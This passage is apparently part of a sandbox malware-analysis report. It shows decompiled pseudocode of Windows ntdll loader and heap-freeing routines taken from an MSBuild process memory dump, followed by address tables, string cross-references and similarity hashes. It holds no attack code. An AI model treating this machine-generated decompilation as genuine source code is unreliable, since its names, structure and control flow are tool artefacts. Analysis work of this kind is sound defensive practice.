                                            					if(_t49 != 0xc000008a) {
                                            						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                                            							if(_t49 != 0xc00000bb) {
                                            								goto L8;
                                            							}
                                            						}
                                            					}
                                            					if(( *0x10f5780 & 0x00000005) != 0) {
                                            						_push(_t49);
                                            						E01085510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                                            						_t53 = _t53 + 0x1c;
                                            					}
                                            					_t49 = 0;
                                            					goto L8;
                                            				} else {
                                            					goto L9;
                                            				}
                                            			}




















                                            0x01038e0f
                                            0x01038e16
                                            0x01038e19
                                            0x01038e1b
                                            0x01038e21
                                            0x01038e7f
                                            0x01038e85
                                            0x01079354
                                            0x0107936c
                                            0x01079371
                                            0x0107937b
                                            0x01079381
                                            0x01079381
                                            0x0107937b
                                            0x01038e9d
                                            0x01038e9d
                                            0x01038e29
                                            0x01038e2c
                                            0x01038e38
                                            0x01038e3e
                                            0x01038e43
                                            0x01038eb5
                                            0x01038eb9
                                            0x010792aa
                                            0x010792af
                                            0x010792e8
                                            0x010792e8
                                            0x010792af
                                            0x01038eb9
                                            0x01038e45
                                            0x01038e53
                                            0x01038e5b
                                            0x01038e5f
                                            0x01038e78
                                            0x01038e78
                                            0x01038e7d
                                            0x01038ec3
                                            0x01038ecd
                                            0x01038ed2
                                            0x01038ed2
                                            0x01038ec5
                                            0x01038ec5
                                            0x00000000
                                            0x01038e7d
                                            0x01038e67
                                            0x01038ea4
                                            0x0107931a
                                            0x00000000
                                            0x00000000
                                            0x01079320
                                            0x01038ea4
                                            0x01038e70
                                            0x01079325
                                            0x01079340
                                            0x01079345
                                            0x01079345
                                            0x01038e76
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000

                                            Strings
                                            • minkernel\ntdll\ldrsnap.c, xrefs: 0107933B, 01079367
                                            • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0107932A
                                            • Querying the active activation context failed with status 0x%08lx, xrefs: 01079357
                                            • LdrpFindDllActivationContext, xrefs: 01079331, 0107935D
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                            • API String ID: 0-3779518884
                                            • Opcode ID: 9ada45fa88e5283380b1d64f31d3b5f1823f211b2fa05d53c8f34a2db486d941
                                            • Instruction ID: 62ecb5ff80b8d43469f708d0a94027633561da4c9c58c24147e24264ccd1fee6
                                            • Opcode Fuzzy Hash: 9ada45fa88e5283380b1d64f31d3b5f1823f211b2fa05d53c8f34a2db486d941
                                            • Instruction Fuzzy Hash: 4A413B31A003159FEB71AA1D8849A79B6FDBB80358F05C3EBF9D457491EB70AC8083A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                            • API String ID: 2994545307-336120773
                                            • Opcode ID: 647e260a64d8a3e33e4e8a3d7a65a18ec260516e41f15bf3088a3f8bb17f27da
                                            • Instruction ID: d842cae4bdc0e41c58377f0d4a4382d314899aa09e56b0f24cdce22187dcfcf7
                                            • Opcode Fuzzy Hash: 647e260a64d8a3e33e4e8a3d7a65a18ec260516e41f15bf3088a3f8bb17f27da
                                            • Instruction Fuzzy Hash: 07310E35200544EFE321DB9DC895FAE77E8FF04B60F2440AAF985DB291D671A880DA69
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 78%
                                            			E010299BF(signed int __ecx, signed short* __edx, signed int* _a4, signed int _a8) {
                                            				char _v5;
                                            				signed int _v12;
                                            				signed int _v16;
                                            				signed short _v20;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				void* __ebp;
                                            				signed short _t186;
                                            				intOrPtr _t187;
                                            				signed short _t190;
                                            				signed int _t196;
                                            				signed short _t197;
                                            				intOrPtr _t203;
                                            				signed int _t207;
                                            				signed int _t210;
                                            				signed short _t215;
                                            				intOrPtr _t216;
                                            				signed short _t219;
                                            				signed int _t221;
                                            				signed short _t222;
                                            				intOrPtr _t228;
                                            				signed int _t232;
                                            				signed int _t235;
                                            				signed int _t250;
                                            				signed short _t251;
                                            				intOrPtr _t252;
                                            				signed short _t254;
                                            				intOrPtr _t255;
                                            				signed int _t258;
                                            				signed int _t259;
                                            				signed short _t262;
                                            				intOrPtr _t271;
                                            				signed int _t279;
                                            				signed int _t282;
                                            				signed int _t284;
                                            				signed int _t286;
                                            				intOrPtr _t292;
                                            				signed int _t296;
                                            				signed int _t299;
                                            				signed int _t307;
                                            				signed int* _t309;
                                            				signed short* _t311;
                                            				signed short* _t313;
                                            				signed char _t314;
                                            				intOrPtr _t316;
                                            				signed int _t323;
                                            				signed char _t328;
                                            				signed short* _t330;
                                            				signed char _t331;
                                            				intOrPtr _t335;
                                            				signed int _t342;
                                            				signed char _t347;
                                            				signed short* _t348;
                                            				signed short* _t350;
                                            				signed short _t352;
                                            				signed char _t354;
                                            				intOrPtr _t357;
                                            				intOrPtr* _t364;
                                            				signed char _t365;
                                            				intOrPtr _t366;
                                            				signed int _t373;
                                            				signed char _t378;
                                            				signed int* _t381;
                                            				signed int _t382;
                                            				signed short _t384;
                                            				signed int _t386;
                                            				unsigned int _t390;
                                            				signed int _t393;
                                            				signed int* _t394;
                                            				unsigned int _t398;
                                            				signed short _t400;
                                            				signed short _t402;
                                            				signed int _t404;
                                            				signed int _t407;
                                            				unsigned int _t411;
                                            				signed short* _t414;
                                            				signed int _t415;
                                            				signed short* _t419;
                                            				signed int* _t420;
                                            				void* _t421;
                                            
                                            				_t414 = __edx;
                                            				_t307 = __ecx;
                                            				_t419 = __edx - (( *(__edx + 4) & 0x0000ffff ^  *(__ecx + 0x54) & 0x0000ffff) << 3);
                                            				if(_t419 == __edx || (( *(__ecx + 0x4c) >> 0x00000014 &  *(__ecx + 0x52) ^ _t419[1]) & 0x00000001) != 0) {
                                            					_v5 = _a8;
                                            					L3:
                                            					_t381 = _a4;
                                            					goto L4;
                                            				} else {
                                            					__eflags =  *(__ecx + 0x4c);
                                            					if( *(__ecx + 0x4c) != 0) {
                                            						_t411 =  *(__ecx + 0x50) ^  *_t419;
                                            						 *_t419 = _t411;
                                            						_t378 = _t411 >> 0x00000010 ^ _t411 >> 0x00000008 ^ _t411;
                                            						__eflags = _t411 >> 0x18 - _t378;
                                            						if(__eflags != 0) {
                                            							_push(_t378);
                                            							E010BFA2B(__ecx, __ecx, _t419, __edx, _t419, __eflags);
                                            						}
                                            					}
                                            					_t250 = _a8;
                                            					_v5 = _t250;
                                            					__eflags = _t250;
                                            					if(_t250 != 0) {
                                            						_t400 = _t414[6];
                                            						_t53 =  &(_t414[4]); // -16
                                            						_t348 = _t53;
                                            						_t251 =  *_t348;
                                            						_v12 = _t251;
                                            						_v16 = _t400;
                                            						_t252 =  *((intOrPtr*)(_t251 + 4));
                                            						__eflags =  *_t400 - _t252;
                                            						if( *_t400 != _t252) {
                                            							L49:
                                            							_push(_t348);
                                            							_push( *_t400);
                                            							E010CA80D(_t307, 0xd, _t348, _t252);
                                            							L50:
                                            							_v5 = 0;
                                            							goto L11;
                                            						}
                                            						__eflags =  *_t400 - _t348;
                                            						if( *_t400 != _t348) {
                                            							goto L49;
                                            						}
                                            						 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
                                            						_t407 =  *(_t307 + 0xb4);
                                            						__eflags = _t407;
                                            						if(_t407 == 0) {
                                            							L36:
                                            							_t364 = _v16;
                                            							_t282 = _v12;
                                            							 *_t364 = _t282;
                                            							 *((intOrPtr*)(_t282 + 4)) = _t364;
                                            							__eflags = _t414[1] & 0x00000008;
                                            							if((_t414[1] & 0x00000008) == 0) {
                                            								L39:
                                            								_t365 = _t414[1];
                                            								__eflags = _t365 & 0x00000004;
                                            								if((_t365 & 0x00000004) != 0) {
                                            									_t284 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
                                            									_v12 = _t284;
                                            									__eflags = _t365 & 0x00000002;
                                            									if((_t365 & 0x00000002) != 0) {
                                            										__eflags = _t284 - 4;
                                            										if(_t284 > 4) {
                                            											_t284 = _t284 - 4;
                                            											__eflags = _t284;
                                            											_v12 = _t284;
                                            										}
                                            									}
                                            									_t78 =  &(_t414[8]); // -8
                                            									_t286 = E0105D540(_t78, _t284, 0xfeeefeee);
                                            									_v16 = _t286;
                                            									__eflags = _t286 - _v12;
                                            									if(_t286 != _v12) {
                                            										_t366 =  *[fs:0x30];
                                            										__eflags =  *(_t366 + 0xc);
                                            										if( *(_t366 + 0xc) == 0) {
                                            											_push("HEAP: ");
                                            											E0100B150();
                                            										} else {
                                            											E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            										}
                                            										_push(_v16 + 0x10 + _t414);
                                            										E0100B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
                                            										_t292 =  *[fs:0x30];
                                            										_t421 = _t421 + 0xc;
                                            										__eflags =  *((char*)(_t292 + 2));
                                            										if( *((char*)(_t292 + 2)) != 0) {
                                            											 *0x10f6378 = 1;
                                            											asm("int3");
                                            											 *0x10f6378 = 0;
                                            										}
                                            									}
                                            								}
                                            								goto L50;
                                            							}
                                            							_t296 = E0102A229(_t307, _t414);
                                            							__eflags = _t296;
                                            							if(_t296 != 0) {
                                            								goto L39;
                                            							} else {
                                            								E0102A309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
                                            								goto L50;
                                            							}
                                            						} else {
                                            							_t373 =  *_t414 & 0x0000ffff;
                                            							while(1) {
                                            								__eflags = _t373 -  *((intOrPtr*)(_t407 + 4));
                                            								if(_t373 <  *((intOrPtr*)(_t407 + 4))) {
                                            									_t301 = _t373;
                                            									break;
                                            								}
                                            								_t299 =  *_t407;
                                            								__eflags = _t299;
                                            								if(_t299 == 0) {
                                            									_t301 =  *((intOrPtr*)(_t407 + 4)) - 1;
                                            									__eflags =  *((intOrPtr*)(_t407 + 4)) - 1;
                                            									break;
                                            								} else {
                                            									_t407 = _t299;
                                            									continue;
                                            								}
                                            							}
                                            							_t62 =  &(_t414[4]); // -16
                                            							E0102BC04(_t307, _t407, 1, _t62, _t301, _t373);
                                            							goto L36;
                                            						}
                                            					}
                                            					L11:
                                            					_t402 = _t419[6];
                                            					_t25 =  &(_t419[4]); // -16
                                            					_t350 = _t25;
                                            					_t254 =  *_t350;
                                            					_v12 = _t254;
                                            					_v20 = _t402;
                                            					_t255 =  *((intOrPtr*)(_t254 + 4));
                                            					__eflags =  *_t402 - _t255;
                                            					if( *_t402 != _t255) {
                                            						L61:
                                            						_push(_t350);
                                            						_push( *_t402);
                                            						E010CA80D(_t307, 0xd, _t350, _t255);
                                            						goto L3;
                                            					}
                                            					__eflags =  *_t402 - _t350;
                                            					if( *_t402 != _t350) {
                                            						goto L61;
                                            					}
                                            					 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t419 & 0x0000ffff);
                                            					_t404 =  *(_t307 + 0xb4);
                                            					__eflags = _t404;
                                            					if(_t404 == 0) {
                                            						L20:
                                            						_t352 = _v20;
                                            						_t258 = _v12;
                                            						 *_t352 = _t258;
                                            						 *(_t258 + 4) = _t352;
                                            						__eflags = _t419[1] & 0x00000008;
                                            						if((_t419[1] & 0x00000008) != 0) {
                                            							_t259 = E0102A229(_t307, _t419);
                                            							__eflags = _t259;
                                            							if(_t259 != 0) {
                                            								goto L21;
                                            							} else {
                                            								E0102A309(_t307, _t419,  *_t419 & 0x0000ffff, 1);
                                            								goto L3;
                                            							}
                                            						}
                                            						L21:
                                            						_t354 = _t419[1];
                                            						__eflags = _t354 & 0x00000004;
                                            						if((_t354 & 0x00000004) != 0) {
                                            							_t415 = ( *_t419 & 0x0000ffff) * 8 - 0x10;
                                            							__eflags = _t354 & 0x00000002;
                                            							if((_t354 & 0x00000002) != 0) {
                                            								__eflags = _t415 - 4;
                                            								if(_t415 > 4) {
                                            									_t415 = _t415 - 4;
                                            									__eflags = _t415;
                                            								}
                                            							}
                                            							_t91 =  &(_t419[8]); // -8
                                            							_t262 = E0105D540(_t91, _t415, 0xfeeefeee);
                                            							_v20 = _t262;
                                            							__eflags = _t262 - _t415;
                                            							if(_t262 != _t415) {
                                            								_t357 =  *[fs:0x30];
                                            								__eflags =  *(_t357 + 0xc);
                                            								if( *(_t357 + 0xc) == 0) {
                                            									_push("HEAP: ");
                                            									E0100B150();
                                            								} else {
                                            									E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            								}
                                            								_push(_v20 + 0x10 + _t419);
                                            								E0100B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t419);
                                            								_t271 =  *[fs:0x30];
                                            								_t421 = _t421 + 0xc;
                                            								__eflags =  *((char*)(_t271 + 2));
                                            								if( *((char*)(_t271 + 2)) != 0) {
                                            									 *0x10f6378 = 1;
                                            									asm("int3");
                                            									 *0x10f6378 = 0;
                                            								}
                                            							}
                                            						}
                                            						_t381 = _a4;
                                            						_t414 = _t419;
                                            						_t419[1] = 0;
                                            						_t419[3] = 0;
                                            						 *_t381 =  *_t381 + ( *_t419 & 0x0000ffff);
                                            						 *_t419 =  *_t381;
                                            						 *(_t419 + 4 +  *_t381 * 8) =  *_t381 ^  *(_t307 + 0x54);
                                            						L4:
                                            						_t420 = _t414 +  *_t381 * 8;
                                            						if( *(_t307 + 0x4c) == 0) {
                                            							L6:
                                            							while((( *(_t307 + 0x4c) >> 0x00000014 &  *(_t307 + 0x52) ^ _t420[0]) & 0x00000001) == 0) {
                                            								__eflags =  *(_t307 + 0x4c);
                                            								if( *(_t307 + 0x4c) != 0) {
                                            									_t390 =  *(_t307 + 0x50) ^  *_t420;
                                            									 *_t420 = _t390;
                                            									_t328 = _t390 >> 0x00000010 ^ _t390 >> 0x00000008 ^ _t390;
                                            									__eflags = _t390 >> 0x18 - _t328;
                                            									if(__eflags != 0) {
                                            										_push(_t328);
                                            										E010BFA2B(_t307, _t307, _t420, _t414, _t420, __eflags);
                                            									}
                                            								}
                                            								__eflags = _v5;
                                            								if(_v5 == 0) {
                                            									L94:
                                            									_t382 = _t420[3];
                                            									_t137 =  &(_t420[2]); // -16
                                            									_t309 = _t137;
                                            									_t186 =  *_t309;
                                            									_v20 = _t186;
                                            									_v16 = _t382;
                                            									_t187 =  *((intOrPtr*)(_t186 + 4));
                                            									__eflags =  *_t382 - _t187;
                                            									if( *_t382 != _t187) {
                                            										L63:
                                            										_push(_t309);
                                            										_push( *_t382);
                                            										_push(_t187);
                                            										_push(_t309);
                                            										_push(0xd);
                                            										L64:
                                            										E010CA80D(_t307);
                                            										continue;
                                            									}
                                            									__eflags =  *_t382 - _t309;
                                            									if( *_t382 != _t309) {
                                            										goto L63;
                                            									}
                                            									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t420 & 0x0000ffff);
                                            									_t393 =  *(_t307 + 0xb4);
                                            									__eflags = _t393;
                                            									if(_t393 == 0) {
                                            										L104:
                                            										_t330 = _v16;
                                            										_t190 = _v20;
                                            										 *_t330 = _t190;
                                            										 *(_t190 + 4) = _t330;
                                            										__eflags = _t420[0] & 0x00000008;
                                            										if((_t420[0] & 0x00000008) == 0) {
                                            											L107:
                                            											_t331 = _t420[0];
                                            											__eflags = _t331 & 0x00000004;
                                            											if((_t331 & 0x00000004) != 0) {
                                            												_t196 = ( *_t420 & 0x0000ffff) * 8 - 0x10;
                                            												_v12 = _t196;
                                            												__eflags = _t331 & 0x00000002;
                                            												if((_t331 & 0x00000002) != 0) {
                                            													__eflags = _t196 - 4;
                                            													if(_t196 > 4) {
                                            														_t196 = _t196 - 4;
                                            														__eflags = _t196;
                                            														_v12 = _t196;
                                            													}
                                            												}
                                            												_t162 =  &(_t420[4]); // -8
                                            												_t197 = E0105D540(_t162, _t196, 0xfeeefeee);
                                            												_v20 = _t197;
                                            												__eflags = _t197 - _v12;
                                            												if(_t197 != _v12) {
                                            													_t335 =  *[fs:0x30];
                                            													__eflags =  *(_t335 + 0xc);
                                            													if( *(_t335 + 0xc) == 0) {
                                            														_push("HEAP: ");
                                            														E0100B150();
                                            													} else {
                                            														E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            													}
                                            													_push(_v20 + 0x10 + _t420);
                                            													E0100B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t420);
                                            													_t203 =  *[fs:0x30];
                                            													__eflags =  *((char*)(_t203 + 2));
                                            													if( *((char*)(_t203 + 2)) != 0) {
                                            														 *0x10f6378 = 1;
                                            														asm("int3");
                                            														 *0x10f6378 = 0;
                                            													}
                                            												}
                                            											}
                                            											_t394 = _a4;
                                            											_t414[1] = 0;
                                            											_t414[3] = 0;
                                            											 *_t394 =  *_t394 + ( *_t420 & 0x0000ffff);
                                            											 *_t414 =  *_t394;
                                            											 *(_t414 + 4 +  *_t394 * 8) =  *_t394 ^  *(_t307 + 0x54);
                                            											break;
                                            										}
                                            										_t207 = E0102A229(_t307, _t420);
                                            										__eflags = _t207;
                                            										if(_t207 != 0) {
                                            											goto L107;
                                            										}
                                            										E0102A309(_t307, _t420,  *_t420 & 0x0000ffff, 1);
                                            										continue;
                                            									}
                                            									_t342 =  *_t420 & 0x0000ffff;
                                            									while(1) {
                                            										__eflags = _t342 -  *((intOrPtr*)(_t393 + 4));
                                            										if(_t342 <  *((intOrPtr*)(_t393 + 4))) {
                                            											break;
                                            										}
                                            										_t210 =  *_t393;
                                            										__eflags = _t210;
                                            										if(_t210 == 0) {
                                            											_t212 =  *((intOrPtr*)(_t393 + 4)) - 1;
                                            											__eflags =  *((intOrPtr*)(_t393 + 4)) - 1;
                                            											L103:
                                            											_t146 =  &(_t420[2]); // -16
                                            											E0102BC04(_t307, _t393, 1, _t146, _t212, _t342);
                                            											goto L104;
                                            										}
                                            										_t393 = _t210;
                                            									}
                                            									_t212 = _t342;
                                            									goto L103;
                                            								} else {
                                            									_t384 = _t414[6];
                                            									_t102 =  &(_t414[4]); // -16
                                            									_t311 = _t102;
                                            									_t215 =  *_t311;
                                            									_v20 = _t215;
                                            									_v16 = _t384;
                                            									_t216 =  *((intOrPtr*)(_t215 + 4));
                                            									__eflags =  *_t384 - _t216;
                                            									if( *_t384 != _t216) {
                                            										L92:
                                            										_push(_t311);
                                            										_push( *_t384);
                                            										E010CA80D(_t307, 0xd, _t311, _t216);
                                            										L93:
                                            										_v5 = 0;
                                            										goto L94;
                                            									}
                                            									__eflags =  *_t384 - _t311;
                                            									if( *_t384 != _t311) {
                                            										goto L92;
                                            									}
                                            									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
                                            									_t386 =  *(_t307 + 0xb4);
                                            									__eflags = _t386;
                                            									if(_t386 == 0) {
                                            										L79:
                                            										_t313 = _v16;
                                            										_t219 = _v20;
                                            										 *_t313 = _t219;
                                            										 *(_t219 + 4) = _t313;
                                            										__eflags = _t414[1] & 0x00000008;
                                            										if((_t414[1] & 0x00000008) == 0) {
                                            											L82:
                                            											_t314 = _t414[1];
                                            											__eflags = _t314 & 0x00000004;
                                            											if((_t314 & 0x00000004) != 0) {
                                            												_t221 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
                                            												_v12 = _t221;
                                            												__eflags = _t314 & 0x00000002;
                                            												if((_t314 & 0x00000002) != 0) {
                                            													__eflags = _t221 - 4;
                                            													if(_t221 > 4) {
                                            														_t221 = _t221 - 4;
                                            														__eflags = _t221;
                                            														_v12 = _t221;
                                            													}
                                            												}
                                            												_t127 =  &(_t414[8]); // -8
                                            												_t222 = E0105D540(_t127, _t221, 0xfeeefeee);
                                            												_v20 = _t222;
                                            												__eflags = _t222 - _v12;
                                            												if(_t222 != _v12) {
                                            													_t316 =  *[fs:0x30];
                                            													__eflags =  *(_t316 + 0xc);
                                            													if( *(_t316 + 0xc) == 0) {
                                            														_push("HEAP: ");
                                            														E0100B150();
                                            													} else {
                                            														E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            													}
                                            													_push(_v20 + 0x10 + _t414);
                                            													E0100B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
                                            													_t228 =  *[fs:0x30];
                                            													_t421 = _t421 + 0xc;
                                            													__eflags =  *((char*)(_t228 + 2));
                                            													if( *((char*)(_t228 + 2)) != 0) {
                                            														 *0x10f6378 = 1;
                                            														asm("int3");
                                            														 *0x10f6378 = 0;
                                            													}
                                            												}
                                            											}
                                            											goto L93;
                                            										}
                                            										_t232 = E0102A229(_t307, _t414);
                                            										__eflags = _t232;
                                            										if(_t232 != 0) {
                                            											goto L82;
                                            										}
                                            										E0102A309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
                                            										goto L93;
                                            									}
                                            									_t323 =  *_t414 & 0x0000ffff;
                                            									while(1) {
                                            										__eflags = _t323 -  *((intOrPtr*)(_t386 + 4));
                                            										if(_t323 <  *((intOrPtr*)(_t386 + 4))) {
                                            											break;
                                            										}
                                            										_t235 =  *_t386;
                                            										__eflags = _t235;
                                            										if(_t235 == 0) {
                                            											_t237 =  *((intOrPtr*)(_t386 + 4)) - 1;
                                            											__eflags =  *((intOrPtr*)(_t386 + 4)) - 1;
                                            											L78:
                                            											_t111 =  &(_t414[4]); // -16
                                            											E0102BC04(_t307, _t386, 1, _t111, _t237, _t323);
                                            											goto L79;
                                            										}
                                            										_t386 = _t235;
                                            									}
                                            									_t237 = _t323;
                                            									goto L78;
                                            								}
                                            							}
                                            							return _t414;
                                            						}
                                            						_t398 =  *(_t307 + 0x50) ^  *_t420;
                                            						_t347 = _t398 >> 0x00000010 ^ _t398 >> 0x00000008 ^ _t398;
                                            						if(_t398 >> 0x18 != _t347) {
                                            							_push(_t347);
                                            							_push(0);
                                            							_push(0);
                                            							_push(_t420);
                                            							_push(3);
                                            							goto L64;
                                            						}
                                            						goto L6;
                                            					} else {
                                            						_t277 =  *_t419 & 0x0000ffff;
                                            						_v16 = _t277;
                                            						while(1) {
                                            							__eflags = _t277 -  *((intOrPtr*)(_t404 + 4));
                                            							if(_t277 <  *((intOrPtr*)(_t404 + 4))) {
                                            								break;
                                            							}
                                            							_t279 =  *_t404;
                                            							__eflags = _t279;
                                            							if(_t279 == 0) {
                                            								_t277 =  *((intOrPtr*)(_t404 + 4)) - 1;
                                            								__eflags =  *((intOrPtr*)(_t404 + 4)) - 1;
                                            								break;
                                            							} else {
                                            								_t404 = _t279;
                                            								_t277 =  *_t419 & 0x0000ffff;
                                            								continue;
                                            							}
                                            						}
                                            						E0102BC04(_t307, _t404, 1, _t350, _t277, _v16);
                                            						goto L20;
                                            					}
                                            				}
                                            			}




















































































                                            0x010299ca
                                            0x010299cc
                                            0x010299df
                                            0x010299e3
                                            0x010299f8
                                            0x010299fb
                                            0x010299fb
                                            0x00000000
                                            0x01029a48
                                            0x01029a48
                                            0x01029a4c
                                            0x01029a51
                                            0x01029a55
                                            0x01029a61
                                            0x01029a66
                                            0x01029a68
                                            0x01071457
                                            0x0107145c
                                            0x0107145c
                                            0x01029a68
                                            0x01029a6e
                                            0x01029a71
                                            0x01029a74
                                            0x01029a76
                                            0x01071466
                                            0x01071469
                                            0x01071469
                                            0x0107146c
                                            0x0107146e
                                            0x01071471
                                            0x01071474
                                            0x01071477
                                            0x01071479
                                            0x0107159c
                                            0x0107159c
                                            0x0107159d
                                            0x010715a6
                                            0x010715ab
                                            0x010715ab
                                            0x00000000
                                            0x010715ab
                                            0x0107147f
                                            0x01071481
                                            0x00000000
                                            0x00000000
                                            0x0107148a
                                            0x0107148d
                                            0x01071493
                                            0x01071495
                                            0x010714c0
                                            0x010714c0
                                            0x010714c3
                                            0x010714c6
                                            0x010714c8
                                            0x010714cb
                                            0x010714cf
                                            0x010714f2
                                            0x010714f2
                                            0x010714f5
                                            0x010714f8
                                            0x01071501
                                            0x01071508
                                            0x0107150b
                                            0x0107150e
                                            0x01071510
                                            0x01071513
                                            0x01071515
                                            0x01071515
                                            0x01071518
                                            0x01071518
                                            0x01071513
                                            0x01071521
                                            0x01071525
                                            0x0107152a
                                            0x0107152d
                                            0x01071530
                                            0x01071532
                                            0x01071539
                                            0x0107153d
                                            0x0107155d
                                            0x01071562
                                            0x0107153f
                                            0x01071555
                                            0x0107155a
                                            0x01071570
                                            0x01071577
                                            0x0107157c
                                            0x01071582
                                            0x01071585
                                            0x01071589
                                            0x0107158b
                                            0x01071592
                                            0x01071593
                                            0x01071593
                                            0x01071589
                                            0x01071530
                                            0x00000000
                                            0x010714f8
                                            0x010714d5
                                            0x010714da
                                            0x010714dc
                                            0x00000000
                                            0x010714de
                                            0x010714e8
                                            0x00000000
                                            0x010714e8
                                            0x01071497
                                            0x01071497
                                            0x010714a4
                                            0x010714a4
                                            0x010714a7
                                            0x010714a9
                                            0x010714ab
                                            0x010714ab
                                            0x0107149c
                                            0x0107149e
                                            0x010714a0
                                            0x010714b0
                                            0x010714b0
                                            0x00000000
                                            0x010714a2
                                            0x010714a2
                                            0x00000000
                                            0x010714a2
                                            0x010714a0
                                            0x010714b3
                                            0x010714bb
                                            0x00000000
                                            0x010714bb
                                            0x01071495
                                            0x01029a7c
                                            0x01029a7c
                                            0x01029a7f
                                            0x01029a7f
                                            0x01029a82
                                            0x01029a84
                                            0x01029a87
                                            0x01029a8a
                                            0x01029a8d
                                            0x01029a8f
                                            0x0107166a
                                            0x0107166a
                                            0x0107166b
                                            0x01071674
                                            0x00000000
                                            0x01071674
                                            0x01029a95
                                            0x01029a97
                                            0x00000000
                                            0x00000000
                                            0x01029aa0
                                            0x01029aa3
                                            0x01029aa9
                                            0x01029aab
                                            0x01029ad7
                                            0x01029ad7
                                            0x01029ada
                                            0x01029add
                                            0x01029adf
                                            0x01029ae2
                                            0x01029ae6
                                            0x01029b22
                                            0x01029b27
                                            0x01029b29
                                            0x00000000
                                            0x01029b2b
                                            0x010715be
                                            0x00000000
                                            0x010715be
                                            0x01029b29
                                            0x01029ae8
                                            0x01029ae8
                                            0x01029aeb
                                            0x01029aee
                                            0x010715cb
                                            0x010715d2
                                            0x010715d5
                                            0x010715d7
                                            0x010715da
                                            0x010715dc
                                            0x010715dc
                                            0x010715dc
                                            0x010715da
                                            0x010715e5
                                            0x010715e9
                                            0x010715ee
                                            0x010715f1
                                            0x010715f3
                                            0x010715f9
                                            0x01071600
                                            0x01071604
                                            0x01071624
                                            0x01071629
                                            0x01071606
                                            0x0107161c
                                            0x01071621
                                            0x01071637
                                            0x0107163e
                                            0x01071643
                                            0x01071649
                                            0x0107164c
                                            0x01071650
                                            0x01071656
                                            0x0107165d
                                            0x0107165e
                                            0x0107165e
                                            0x01071650
                                            0x010715f3
                                            0x01029af4
                                            0x01029af7
                                            0x01029afc
                                            0x01029b00
                                            0x01029b04
                                            0x01029b08
                                            0x01029b14
                                            0x010299fe
                                            0x01029a04
                                            0x01029a07
                                            0x00000000
                                            0x01029a29
                                            0x0107169c
                                            0x010716a0
                                            0x010716a5
                                            0x010716a9
                                            0x010716b5
                                            0x010716ba
                                            0x010716bc
                                            0x010716be
                                            0x010716c3
                                            0x010716c3
                                            0x010716bc
                                            0x010716c8
                                            0x010716cc
                                            0x0107181b
                                            0x0107181b
                                            0x0107181e
                                            0x0107181e
                                            0x01071821
                                            0x01071823
                                            0x01071826
                                            0x01071829
                                            0x0107182c
                                            0x0107182e
                                            0x01071688
                                            0x01071688
                                            0x01071689
                                            0x0107168b
                                            0x0107168c
                                            0x0107168d
                                            0x0107168f
                                            0x01071692
                                            0x00000000
                                            0x01071692
                                            0x01071834
                                            0x01071836
                                            0x00000000
                                            0x00000000
                                            0x0107183f
                                            0x01071842
                                            0x01071848
                                            0x0107184a
                                            0x01071875
                                            0x01071875
                                            0x01071878
                                            0x0107187b
                                            0x0107187d
                                            0x01071880
                                            0x01071884
                                            0x010718a7
                                            0x010718a7
                                            0x010718aa
                                            0x010718ad
                                            0x010718b6
                                            0x010718bd
                                            0x010718c0
                                            0x010718c3
                                            0x010718c5
                                            0x010718c8
                                            0x010718ca
                                            0x010718ca
                                            0x010718cd
                                            0x010718cd
                                            0x010718c8
                                            0x010718d5
                                            0x010718da
                                            0x010718df
                                            0x010718e2
                                            0x010718e5
                                            0x010718e7
                                            0x010718ee
                                            0x010718f2
                                            0x01071912
                                            0x01071917
                                            0x010718f4
                                            0x0107190a
                                            0x0107190f
                                            0x01071925
